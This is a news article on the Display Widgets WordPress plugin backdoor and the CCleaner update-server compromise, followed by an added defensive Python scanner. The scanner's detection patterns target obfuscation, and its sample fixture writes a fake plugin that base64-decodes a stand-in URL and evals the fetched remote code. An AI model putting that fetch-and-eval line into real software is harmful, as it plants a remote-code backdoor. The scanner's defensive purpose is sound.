Have you checked your plugins recently?
Latest case of rogue WordPress plugin thought to have installed backdoors on up to 200,000 websites.
Hacked WordPress plugins are certainly not uncommon, and of late there has been a spate of more underhand attacks, the latest of which has apparently installed a backdoor in up to 200,000 websites.
The researchers who highlighted the problem recommend website owners remove the plugin in question - known as Display Widgets - immediately. According to IT security firm WordFence the last three releases of the plugin have contained code that allows the author to publish any content on an affected site.
Originally developed as an open-source plugin, the popular tool was sold on 21 June and the new owner immediately released an updated version, 2.6.0, followed by another three versions, all of which - it is alleged by WordFence - attempted variations on a theme of running malicious code. Each time the plugin was pulled from the repository by WordPress, but was then tweaked and resubmitted. The full blow-by-blow account is here.
“The authors of the plugin are actively maintaining their malicious code, switching between sources for spam and working to obfuscate (hide) the domain they are fetching spam from,” said Mark Maunder, CEO, WordFence.
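The question in the headline is easier to answer with a script than by hand. The following is an added example, not WordFence's tooling and not code from the plugin or the article: it walks a wp-content/plugins tree, reads each plugin's header for its name and version, flags the suspect plugin if it is at or above the first post-sale release, and greps every PHP file for the kind of obfuscation (base64_decode, eval, gzinflate, hard-coded remote fetches) that hides a spam source. The directory slug `display-widgets`, the 2.6.0 threshold and the sample plugin tree are assumptions made for the example; the pattern matches are leads to inspect, not proof of compromise.

```python
import re
import tempfile
from pathlib import Path

# Assumption for this example: the plugin lives under the slug "display-widgets"
# and, per the article's account, 2.6.0 was the first release after the sale.
SUSPECT_PLUGINS = {"display-widgets": (2, 6, 0)}

# Generic heuristics for obfuscated remote-content fetching. A hit is a lead to
# read by hand, not a verdict: legitimate plugins occasionally use these too.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"\bbase64_decode\s*\("),
    re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\("),
    re.compile(r"\b(file_get_contents|curl_init|wp_remote_get)\s*\(\s*['\"]https?://"),
]

# WordPress plugin headers are "Key: value" lines inside the leading PHP comment.
HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Version)\s*:\s*(.+?)\s*$", re.M)


def parse_version(s):
    """'2.6.0' -> (2, 6, 0); trailing non-numeric parts are dropped."""
    parts = []
    for piece in s.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def read_plugin_header(plugin_dir):
    """Return (name, version) from the first PHP file carrying a plugin header."""
    for php in sorted(Path(plugin_dir).glob("*.php")):
        text = php.read_text(errors="ignore")[:8192]  # WordPress reads the first 8 KB
        fields = dict(HEADER_RE.findall(text))
        if "Plugin Name" in fields:
            return fields["Plugin Name"], fields.get("Version", "0")
    return None, None


def scan_plugin(plugin_dir):
    """Return a list of human-readable findings for one plugin directory."""
    plugin_dir = Path(plugin_dir)
    slug = plugin_dir.name
    findings = []
    name, version = read_plugin_header(plugin_dir)
    threshold = SUSPECT_PLUGINS.get(slug)
    if threshold and version is not None and parse_version(version) >= threshold:
        wanted = ".".join(map(str, threshold))
        findings.append(f"{slug} ({name}) {version}: at or above {wanted}, remove it")
    for php in sorted(plugin_dir.rglob("*.php")):
        text = php.read_text(errors="ignore")
        for pat in SUSPICIOUS_PATTERNS:
            if pat.search(text):
                findings.append(f"{slug}: {php.relative_to(plugin_dir)} matches {pat.pattern}")
    return findings


def scan_plugins_root(root):
    """Scan every plugin under wp-content/plugins; returns {slug: [findings]}."""
    return {p.name: scan_plugin(p) for p in sorted(Path(root).iterdir()) if p.is_dir()}


def build_sample_tree():
    """Constructed sample plugin tree for offline use; not real plugin code."""
    root = Path(tempfile.mkdtemp()) / "plugins"
    bad = root / "display-widgets"
    bad.mkdir(parents=True)
    (bad / "display-widgets.php").write_text(
        "<?php\n/**\n * Plugin Name: Display Widgets\n * Version: 2.6.1\n */\n"
        "$u = base64_decode('aHR0cDovL2V4YW1wbGUuY29tLw==');\n"  # hides the spam source
        "eval(file_get_contents($u));\n"
    )
    good = root / "hello-dolly"
    good.mkdir()
    (good / "hello.php").write_text(
        "<?php\n/**\n * Plugin Name: Hello Dolly\n * Version: 1.6\n */\n"
        "function hello_dolly() { echo 'Hello, Dolly'; }\n"
    )
    return root


if __name__ == "__main__":
    # Point this at a real wp-content/plugins directory instead of the sample.
    for slug, findings in scan_plugins_root(build_sample_tree()).items():
        print(slug, "-> clean" if not findings else "")
        for line in findings:
            print("   ", line)
```

Run it against a real install with `scan_plugins_root("/var/www/html/wp-content/plugins")`; the version check only fires for slugs you list in `SUSPECT_PLUGINS`, while the pattern scan runs over everything, which is the part that catches a plugin whose authors keep re-obfuscating the fetch.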
Ilia Kolochenko, CEO of High-Tech Bridge, commented that even non-malicious plugins pose a significant threat to site owners and consumers: “WordPress plugins are a very well-known source of vulnerabilities. Nowadays, critical RCEs and Arbitrary File Upload flaws are quite rare, but as we can see - they still exist and complement less dangerous but more frequent XSS and SQL injections. Unlike the core WordPress installation, which is maintained and supported by a team of professionals, third-party plugins are often abandoned or release security patches with a significant delay.
“The best way to avoid security problems with plugins would be to stop using them, but if there is no such possibility - WordPress owners shall rename or hide the admin directory, implement two-factor authentication (however, it won’t save from RCE) and hide the admin panel. A simple WAF can also be a very good idea (however, it will not help against advanced vectors of XSS). Obviously, the core WP installation and all updatable plugins shall be maintained up to date.”
Of course, plenty of non-WordPress software ships with critical vulnerabilities of its own, but hijacking a trusted plugin or update channel to deliver malware is a technique that is growing in popularity.
Just a few days ago the system-cleaning utility CCleaner was compromised and more than two million users unwittingly installed malware when Piriform, the developer of CCleaner, now owned by security firm Avast, had its update server somehow compromised. The company said that at some point between 15 August, when it released version v5.33.6162 of the software, and 12 September, when it updated its servers with a new version, a trojan was loaded into the download package.
The company claims “The threat has now been resolved”, and that investigations are ongoing, but the incident will doubtless concern the 2.27m users who trusted the tool. In short, blind trust is a dangerous thing in software terms, whoever the vendor...